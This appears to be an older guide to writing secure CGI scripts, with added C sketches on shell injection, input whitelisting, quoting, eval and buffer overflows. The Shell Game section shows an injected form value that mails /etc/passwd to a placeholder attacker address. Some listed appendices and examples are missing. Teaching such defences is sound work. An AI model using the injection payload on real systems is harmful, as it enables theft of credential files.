[Because we need to use all of the different quote characters within many of the examples, literal strings are not surrounded by quotes; instead user-input strings are shown in a , and program strings are shown with a dark background and green text.]
Contents:
Shell Game
Other Problems
Summary
Appendix A: Dangerous Characters
Appendix B: Unsafe Operations
Appendix C: Unsafe Library Functions

Shell Game

We'll start with a few examples of how you can get into trouble. This bit of perl code is intended to search for files in a specific directory and find any that match a user-provided search specification:
open(FILES, "/bin/ls /data/cardfiles | grep $searchspec |");
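Suppose the user enters a value such as the following into the form's searchspec field:
blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`
The shell is then handed the command line below. It runs the backticked mailx command first, which mails the password file to the attacker:
/bin/ls /data/cardfiles | grep blah `/bin/mailx -s anothervictim evilperson@evildomain.org < /etc/passwd`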
Most examples of security problems in CGIs can be traced to the fact that a shell is unexpectedly started and handed some data from the HTML form. And in almost every case, the shell is started simply as a convenient way to start some other outside program. (Our examples focus on just one way this can happen; a list of possible trouble spots is found in Appendix B.) This brings us to one of the most important recommendations here:
Avoid starting external programs where possible. It is always best if you can build all of the needed functionality into your CGI. Even if you start the external program in a secure way, it's possible that the external program could manage to do something insecure that you didn't expect.
But sometimes you have to start external programs. Can it be done securely? The best way to do this is to make sure the user data is clean of any trouble. In fact, the best way to make any CGI secure is to completely isolate the input data from any possible abuse. Suppose a field on the form has just three possible values, Yes, No, and Maybe. You could simply compare the input value to each of these three values, and if it doesn't match any of them, you immediately generate an error and give up. If there is an exact match, then you know the value is completely safe to use.
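The exact-match check described above might look something like the following in C. This is only a minimal sketch: the function name is_allowed_choice is made up for illustration, and the list of values simply mirrors the Yes/No/Maybe example.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if value exactly matches one of the permitted choices, else 0.
   The function name is hypothetical; the choices mirror the Yes/No/Maybe
   example in the text. */
int is_allowed_choice(const char *value)
{
    static const char *const allowed[] = { "Yes", "No", "Maybe" };
    size_t i;

    if (value == NULL)
        return 0;
    for (i = 0; i < sizeof allowed / sizeof allowed[0]; i++) {
        /* strcmp demands an exact, case-sensitive match of the whole string */
        if (strcmp(value, allowed[i]) == 0)
            return 1;
    }
    return 0;
}
```

Because the comparison covers the whole string, an input like "Yes; rm -rf /" is rejected just as readily as plain garbage would be.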
As an aside, you can't rely on the HTML form to provide this constraint. If you have a pulldown menu that contains a list of values, it is still possible for a malicious user to submit other values you don't list. They can simply copy your HTML form, and edit the values; this will work for both the GET and POST methods. Also note that a malicious user can simply encode things directly in the URL for use with the GET method, and because of how most CGI libraries work, it will probably work even if the author was originally using POST.
Unfortunately, it is not always possible to constrain your input so tightly. For instance, in a search form, you usually can't predict every reasonable search term in advance. If you can't constrain the input, and you have to start an outside program, your best bet is to avoid using the shell to start it. If you are just starting the outside program, and the current one is finished, you can just use exec(), which replaces the current program with the new one. This command exists (in one form or another) in shell, perl, and C (note that care must be used in perl; see Appendix B). In all three languages, you'll be protected from immediate harm (but you still have to worry about what the new program does with the data).

But if you are opening a pipe to a command (as in the first example), then coding this is a bit trickier. You need to understand pipe(), fork(), and exec(), and a complete description is beyond the scope of this article. Perl will do a fork() and exec() for you with the system() function (note that this doesn't set up piped I/O). However, care must be taken to use the correct form; otherwise a shell may still be used. For more on this, see the line item for the system() function in Appendix B, in the perl section.
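To give a rough idea of what the pipe(), fork(), and exec() combination involves, here is a small C sketch. It is not a complete treatment: the function name run_capture and its parameters are invented for this illustration, error handling is minimal, and interrupted reads are not retried. The point is only that the argument list goes straight to the new program, so no shell ever looks at the user's data.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: runs cmd[0] with the given argument list, with no
   shell involved, and copies up to outsz-1 bytes of its standard output
   into out (always NUL-terminated on success).
   Returns the child's exit status, or -1 on failure. */
int run_capture(char *const cmd[], char *out, size_t outsz)
{
    int fds[2];
    pid_t pid;
    size_t used = 0;
    ssize_t n;
    char discard[256];
    int status;

    if (outsz == 0 || pipe(fds) == -1)
        return -1;

    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: make the pipe's write end our stdout, then exec. */
        close(fds[0]);
        if (fds[1] != STDOUT_FILENO) {
            if (dup2(fds[1], STDOUT_FILENO) == -1)
                _exit(127);
            close(fds[1]);
        }
        execvp(cmd[0], cmd);   /* arguments are passed as-is, unparsed */
        _exit(127);            /* only reached if exec failed */
    }

    /* Parent: read the child's output without writing past the buffer. */
    close(fds[1]);
    while (used < outsz - 1 &&
           (n = read(fds[0], out + used, outsz - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    /* Drain anything that did not fit so the child is not left blocked. */
    while (read(fds[0], discard, sizeof discard) > 0)
        ;
    close(fds[0]);

    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A search could then be started with an argument list along the lines of grep, -e, the user's pattern, and /data/phonebook, followed by a terminating NULL. Backticks or semicolons in the pattern reach grep as ordinary characters. As the text warns, this still says nothing about what the new program itself does with that data.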
If you aren't a system programmer, or if you have particularly complex file redirection needs, then it may be difficult to avoid the temptation to let the shell start your external program. Even if you do use exec, if you don't control the sources to the outside program, you still aren't protected. So what else can we do to stay safe?
An adequate (but not great) solution is to attempt to strip out all of the dangerous characters. The problem with this is that the list is long, and you might miss something. Worse, which characters are dangerous depends on exactly what you are doing, and which language(s) you are working with. Consider this example:
open(PHONE, "grep $name /data/phonebook |");
If you can identify every dangerous character and strip them out, that's great. In some cases, you can even simply limit the input to alphanumerics, which will provide good protection. But suppose the input is supposed to include some of these dangerous characters? If you can't filter them out, the next best thing is to quote the characters so that they won't be dangerous anymore:
open(PHONE, "grep '$name' /data/phonebook |");
A simpler way to handle quoting is to use a backslash in front of each problem character, because it's a more consistent approach (there's no bizarre exception like quoting the single quote above). You just have to remember to backslash everything that might be a problem (see Appendix A). In many cases, you can even put a backslash in front of every character (including normal characters) and get the protection you want without causing any problems. Again though, if the string goes through additional evaluations, you have to add quoting for each evaluation, and this becomes very complex (2^n - 1 backslashes are needed in front of a character that must survive n evaluations).
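Two of the approaches above, limiting input to alphanumerics and backslashing, can be sketched in C roughly as follows. The function names, the maxlen limit, and the decision to backslash every character that is not an ASCII letter or digit are assumptions made for this illustration. The sketch also refuses newlines (the shell treats a backslash followed by a newline as a line continuation and drops both) and non-ASCII bytes, and it protects against a single pass of shell evaluation only, for text that is not placed inside quotes.

```c
#include <stddef.h>

/* 1 if c is an ASCII letter or digit, else 0. Written out by hand so the
   result does not depend on the current locale. */
static int is_ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') ||
           (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/* Hypothetical filter: returns 1 if s is non-empty, at most maxlen
   characters long, and purely alphanumeric; returns 0 otherwise. */
int is_safe_alnum(const char *s, size_t maxlen)
{
    size_t i;

    if (s == NULL || s[0] == '\0')
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        if (i >= maxlen || !is_ascii_alnum((unsigned char)s[i]))
            return 0;
    }
    return 1;
}

/* Hypothetical quoting helper: copies in to out, putting a backslash in
   front of every character that is not an ASCII letter or digit.
   Returns 0 on success, or -1 if out is too small or the input contains
   a newline or a non-ASCII byte. */
int backslash_escape(const char *in, char *out, size_t outsz)
{
    size_t used = 0;

    if (in == NULL || out == NULL || outsz == 0)
        return -1;
    for (; *in != '\0'; in++) {
        unsigned char c = (unsigned char)*in;
        int plain = is_ascii_alnum(c);
        size_t need = plain ? 1 : 2;

        /* the extra 1 leaves room for the terminating NUL */
        if (c == '\n' || c >= 0x80 || used + need + 1 > outsz)
            return -1;
        if (!plain)
            out[used++] = '\\';
        out[used++] = (char)c;
    }
    out[used] = '\0';
    return 0;
}
```

With this sketch, a name such as O'Brien fails the alphanumeric filter, while the quoting helper turns it into O\'Brien. The output buffer needs up to twice the input length plus one byte.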
Note that with perl, if there are no shell special characters in an open command, then it won't use the shell to interpret the command. Unfortunately, backslashes are not counted as special characters, so if you protect through backslashing, the backslashes may not be stripped, depending on how perl chooses to execute the command. And you can't rely on perl not using the shell, because if user input contains special characters, then it may behave differently than it does in your tests.

Other Problems

That about covers all the different approaches to making yourself safe from shells. But this is only one way in which you can get into trouble.
Any interpreted language can expose the input string to unexpected evaluations. Normally, in interpreted languages, simply having the information stored in a variable offers some protection from problems. For instance, in perl, $total = $input*1.15 + 37.50; cannot be subverted by putting dangerous characters into the $input variable, because by the time perl replaces the variable with its value, it has already finished checking for backticks and things like that. This is also true if /bin/sh is your scripting language. However, both of these languages have an eval statement, which causes a second pass of evaluation to occur. Here's an example of how this can be handy. Part of the user input involves selecting a sorting function, which is stored in the variable $howsort:
@newlist = eval "sort $howsort \@oldlist";   # the string is parsed as perl code at run time
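Since eval treats whatever is in $howsort as code, one way to keep the flexibility without the second evaluation pass is to use the user's choice only as a key into a fixed table of sorting functions. The following C sketch illustrates the idea; the function names and the two sort names ("ascending" and "descending") are invented for the example and are not taken from the original program.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

typedef int (*compare_fn)(const void *, const void *);

/* Comparison callbacks for qsort over an array of C strings. */
static int by_ascending(const void *a, const void *b)
{
    return strcmp(*(const char *const *)a, *(const char *const *)b);
}

static int by_descending(const void *a, const void *b)
{
    return strcmp(*(const char *const *)b, *(const char *const *)a);
}

/* Maps a user-supplied name to a comparison function; NULL if unknown.
   The names in the table are hypothetical. */
compare_fn lookup_sort(const char *howsort)
{
    static const struct { const char *name; compare_fn fn; } table[] = {
        { "ascending",  by_ascending  },
        { "descending", by_descending },
    };
    size_t i;

    if (howsort == NULL)
        return NULL;
    for (i = 0; i < sizeof table / sizeof table[0]; i++) {
        if (strcmp(howsort, table[i].name) == 0)
            return table[i].fn;
    }
    return NULL;
}

/* Sorts an array of strings in place. Returns -1 and leaves the array
   untouched if howsort is not one of the known names. */
int sort_list(const char **list, size_t count, const char *howsort)
{
    compare_fn fn = lookup_sort(howsort);

    if (fn == NULL)
        return -1;
    qsort(list, count, sizeof list[0], fn);
    return 0;
}
```

The user's string is only ever compared against known names, never executed, so anything unexpected simply results in an error.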
Compiled languages that use the C library functions suffer from a problem of their own. Because many of the library functions don't do bounds checking on input strings, it is possible to overflow a buffer while reading input, overwrite the stack, and cause the program to execute machine code that was supplied by the user. So a user can send arbitrarily long query strings to your program, hoping to overflow the buffer and run something of their own. Contrary to popular belief, access to source code is not required; the evildoer just has to keep trying inputs of different lengths.
This problem can be avoided by taking care not to let buffers overflow. If you are using read() in a loop, just add an exit condition for hitting the end of the buffer. For the library functions, there are safe forms of most functions. Even where there aren't, you only have to check that a string is short enough before using it in an unsafe function. Appendix C lists some unsafe functions and their safe equivalents.
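The check-the-length-first idea can be sketched like this in C. The function name copy_checked is made up for the example, and refusing over-long input outright (rather than truncating it) is a design choice of this sketch, not something the text prescribes.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copies src into dst only if it fits, including the
   terminating NUL. Returns 0 on success, or -1 if src is too long, in
   which case dst is set to the empty string. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    if (strlen(src) >= dstsz)
        return -1;            /* would overflow: refuse instead of copying */
    strcpy(dst, src);         /* safe here only because of the check above */
    return 0;
}
```

An 8-byte buffer accepts strings of up to 7 characters with this helper; anything longer is rejected before strcpy() is ever called.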
Even if you avoid all of the above general-case pitfalls, there's still room for evil to occur. There are a great number of application-specific holes that you could leave if you aren't careful. Here are some examples:
Appendix B: Possibly Unsafe Operations

The following problems should NOT be considered an exhaustive list.
C
Simply using these functions doesn't make you safe; you have to make sure the size limits you use are set to match the buffer sizes you have (minus one, usually). For example, it is tempting to use read or fread (not listed here because they're generally safe) with the size set to the value from the Content-Length HTTP field, but this can lead to a buffer overrun if that value is larger than your buffer.
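As an illustration of the Content-Length case, the following C sketch compares the claimed length against the buffer size before calling fread. The function name read_body and its parameters are hypothetical, and turning the header value into a number (for example with strtol) is assumed to have happened already.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: reads a request body of content_length bytes from
   in into buf and NUL-terminates it. A body that would not fit in bufsz-1
   bytes is refused rather than truncated. Returns the number of bytes
   read, or -1 on bad arguments, oversize input, or a short read. */
long read_body(FILE *in, long content_length, char *buf, size_t bufsz)
{
    size_t want, got;

    if (in == NULL || buf == NULL || bufsz == 0)
        return -1;
    /* The size limit is the buffer size minus one, never the client's claim. */
    if (content_length < 0 || (unsigned long)content_length > bufsz - 1)
        return -1;
    want = (size_t)content_length;
    got = fread(buf, 1, want, in);
    buf[got] = '\0';
    if (got != want)
        return -1;   /* client sent fewer bytes than it claimed */
    return (long)got;
}
```

With a 16-byte buffer, a 9-byte body is read normally, while a claimed length of 4096 is turned away before a single byte is read.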